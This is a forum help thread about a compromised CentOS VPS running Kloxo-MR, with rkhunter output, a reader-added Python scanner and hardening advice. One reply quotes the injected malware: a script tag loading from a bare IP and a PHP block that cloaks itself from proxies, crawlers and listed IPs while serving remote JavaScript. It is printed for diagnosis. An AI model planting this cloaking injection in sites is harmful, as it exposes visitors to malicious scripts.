MRatWork Forum by Mustafa Ramadhan
General Discussions => GNU/Linux Helps => Topic started by: costa1988sv on 2013-02-24, 04:14:06
-
Someone is modifying files and the MySQL database on my VPS. The first time it modified files and stopped, then the MySQL database, and now files again. I changed the password and switched to Kloxo-MR, but it is not fixed. Can he do that from my PHP script?
[ Rootkit Hunter version 1.4.0 ]
Checking rkhunter version...
This version : 1.4.0
Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]
Checking rkhunter data files...
Checking file mirrors.dat [ No update ]
Checking file programs_bad.dat [ No update ]
Checking file backdoorports.dat [ No update ]
Checking file suspscan.dat [ No update ]
Checking file i18n/cn [ No update ]
Checking file i18n/de [ No update ]
Checking file i18n/en [ No update ]
Checking file i18n/zh [ No update ]
Checking file i18n/zh.utf8 [ No update ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
File: /etc/rkhunter.conf
Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
Current size: 37361 Stored size: 37357
Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
/proc/modules output:
lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
SSH configuration option 'PermitRootLogin': yes
Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
/dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.
-
You can attach here the files with the warnings 'Bourne-Again shell script text executable' and 'perl script text executable'.
I want to compare them with my own systems.
Better update your Kloxo-MR and then report your system here by running 'sh /script/sysfo'
-
sh /script/sysfo
sh: /script/sysfo: No such file or directory
-
You need to update to the latest Kloxo-MR version if '/script/sysinfo' is not found.
-
Looks like the content of ifdown and the other files is the same as on my servers.
It's a 'false positive'.
-
Yes, got the same. Just look for rootkits.
-
The rootkit scan was clean.
How do I update?
Current Version: 6.5.0.c.2013021802
-
The rootkit scan was clean.
How do I update?
Current Version: 6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644 (http://forum.mratwork.com/viewtopic.php?f=4&t=644)
-
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
1. MySQL: mysql-5.0.96-1
2. PHP: php53u-5.3.21-1.ius.el5
3. Httpd: httpd-2.2.23-3.el5
4. Lighttpd: --uninstalled--
5. Nginx: nginx-1.3.13-1.el5
6. Qmail: qmail-1.03-1.5.15
D. Php-type (for Httpd/proxy): php-fpm_worker
E. Memory:
                    total   used   free   shared   buffers   cached
Mem:                 2048    805   1242        0         0        0
-/+ buffers/cache:            805   1242
Swap:                   0      0      0
I installed the new version and I get random 500 errors and content encoding errors.
-
Switched to event and no more errors.
-
In top I have 15+ /usr/libexec/courier-authlib/authdaemond processes.
My script is 200% faster, but WordPress is 25% slower.
-
In top I have 15+ /usr/libexec/courier-authlib/authdaemond processes.
My script is 200% faster, but WordPress is 25% slower.
Those are not 'Security Problems'.
-
Today he modified a text file that I use with include.
He added at the end:
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
-
And in PHP files:
error_reporting(0);   // hide PHP warnings that could reveal the injected block
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);   // first two characters of the visitor IP
if(strlen($_SERVER['HTTP_REFERER']))
{
$referer = parse_url($_SERVER['HTTP_REFERER']);
$referer['host'] = str_replace("www.", "", strtolower($referer['host']));
}
// IP prefixes and user agents that get nothing injected (cloaking, so the owner and crawlers see a clean page)
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222" , "125" ,
"202" , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
"87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
"164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
// visitors that arrive through any kind of proxy get nothing
if ( $_SERVER['HTTP_X_FORWARDED_FOR']
|| $_SERVER['HTTP_X_FORWARDED']
|| $_SERVER['HTTP_FORWARDED_FOR']
|| $_SERVER['HTTP_CLIENT_IP']
|| $_SERVER['HTTP_FORWARDED']
|| $_SERVER['HTTP_VIA']
|| $_SERVER['HTTP_CLIENT_IP']
|| $_SERVER['HTTP_FORWARDED_FOR_IP']
|| $_SERVER['VIA']
|| $_SERVER['X_FORWARDED_FOR']
|| $_SERVER['FORWARDED_FOR']
|| $_SERVER['X_FORWARDED']
|| $_SERVER['FORWARDED']
|| $_SERVER['CLIENT_IP']
|| $_SERVER['FORWARDED_FOR_IP']
|| $_SERVER['CLIENT_IP']
|| $_SERVER['HTTP_PROXY_CONNECTION'])
{
echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){   // only visitors that came from another site are served
if (in_array($ip222, $iptarget)) {   // listed IP prefix: nothing
echo "";
} elseif (in_array($useragent111, $ugtarget)){   // search engine crawlers and listed browsers: nothing
echo "";
} elseif (!in_array($referer['host'], $rfbad)){   // everyone else: load the remote script
//echo "<script type=\"text/javascript\" src=\"http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107\"></script>";
//echo "<script src=\"http://yourjavascript.com/26202461412/my-overlay.js\"></script>";
echo "<script type=\"text/javascript\" src=\"http://yourjavascript.com/30131107225/h1.js\"></script>";
}
}
-
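Added example, not code from the thread or from Kloxo-MR: a small Python triage scanner that walks a web root and flags the two indicators quoted above (an appended external script tag loaded from a bare IP or a .php endpoint, and the PHP cloaking block built from error_reporting(0), proxy-header, IP-prefix and crawler checks), and also lists files modified after a chosen timestamp, the same stored-vs-current mtime idea rkhunter used for /etc/rkhunter.conf. The function names and the sample files are constructed for the example.

```python
import os
import re
import tempfile
# Patterns derived from the injected code quoted in this thread.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc=["\'](https?://([^/"\']+)[^"\']*)["\']', re.I)
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CLOAK_MARKERS = {
    "error_reporting(0)": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "proxy-header check": re.compile(r"\$_SERVER\[['\"]HTTP_X_FORWARDED_FOR['\"]\]"),
    "ip-prefix filter": re.compile(r"substr\s*\(\s*\$_SERVER\[['\"]REMOTE_ADDR['\"]\]\s*,\s*0\s*,\s*2\s*\)"),
    "crawler UA filter": re.compile(r"Googlebot|Mediapartners-Google"),
}

def classify(text):
    """Return indicator strings found in one file's content; [] means nothing found."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        # A script pulled from a bare IP or a .php endpoint is how the include file was tampered with.
        if IP_HOST.match(m.group(2)) or m.group(1).split("?")[0].lower().endswith(".php"):
            hits.append("external script: " + m.group(1))
    cloak = [n for n, rx in CLOAK_MARKERS.items() if rx.search(text)]
    # One marker alone is common in honest code; two or more reproduce the cloaking structure.
    if len(cloak) >= 2:
        hits.append("php cloaking block: " + ", ".join(cloak))
    return hits

def scan(root, modified_since=0.0, exts=(".php", ".inc", ".txt", ".html")):
    """Return (relative path, hits) for files under root that match or changed after modified_since."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(f for f in files if f.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = classify(fh.read())
            if hits or os.path.getmtime(path) >= modified_since:
                found.append((os.path.relpath(path, root), hits))
    return found

SAMPLES = {  # constructed samples, not files from the poster's server
    "header.txt": 'Welcome\n<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>\n',
    "index.php": "<?php\nerror_reporting(0);\nif ($_SERVER['HTTP_X_FORWARDED_FOR']) { echo ''; }\n$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);\n",
    "clean.php": "<?php\nerror_reporting(0);\necho '<script src=\"https://cdn.example.com/app.js\"></script>';\n",
}

def self_check():
    root = tempfile.mkdtemp()
    for name, body in SAMPLES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return {p: h for p, h in scan(root, float("inf")) if h}
```

Run scan("/home/<user>/public_html", modified_since=<epoch of last known-good backup>) to get both the matched files and everything touched since; review the "recently changed but no hits" entries by hand, since the regexes only know this one injection.
-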
Questions:
1. Did you install Kloxo-MR as a fresh install or update from Kloxo Official?
2. Is the attack by the hacker on all domains or just a certain domain?
3. What app (WordPress, etc.) is on the domain that was attacked?
-
So, you mean you updated from Kloxo to Kloxo-MR?
If it is only one domain, or more than one domain but still one user, that means something is wrong with the app code.
-
I upgraded to Kloxo-MR from Kloxo.
Last night I updated Kloxo-MR.
The other domains are not too popular. How can he modify files from a script? curl, fopen?
-
I will move your thread to 'GNU/Linux Helps' because this thread is not related to Kloxo-MR but to your PHP code.
Possibly he has a 'backdoor' on your website and/or your code is not good.
Usually it is enough to disable the functions 'exec,passthru,shell_exec,system,proc_open,popen,show_source' (default in Kloxo-MR).
-
I've disabled allow_url_fopen and allow_url_include.
Thank you for your help, I will install a fresh Kloxo-MR when the backup works.